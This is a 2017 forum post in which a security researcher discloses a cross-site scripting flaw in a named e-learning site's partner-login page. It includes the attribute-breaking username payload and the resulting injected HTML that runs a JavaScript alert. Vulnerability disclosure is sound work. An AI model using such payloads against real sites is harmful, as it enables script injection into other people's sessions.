XSS vulnerability in partner-login

Bugs Reports and Useful Links

XSS vulnerability in partner-login

Postby hddananjaya » Tue Jan 31, 2017 8:12 pm

Cross Site Scripting(XSS) vulnerability in partner-login

Study Case : efrontlearning.com/partner-login

Payload :
username :
Code: Select all
"><object data=alert('@_hddananjaya')>

password : anything

Then what happens :
HTML code will replace like this
Code: Select all
<input id="login" type="text" class="form-control" name="login" placeholder="Enter username" style="color:#000" autofocus value=""><object data=javascript:alert('@_hddananjaya')>">


Result : <object data=javascript:alert('@_hddananjaya')> will execute and pop-up will show my twitter id

How bad is it and how to prevent : visit Open Web Application Security Project (OWASP)

HD Dananjaya (@_hddananjaya)
Cyber Security Researcher
hddananjaya
 
Posts: 2
Joined: Tue Jan 31, 2017 7:38 pm

Return to Bugs

Who is online

Users browsing this forum: Google [Bot] and 1 guest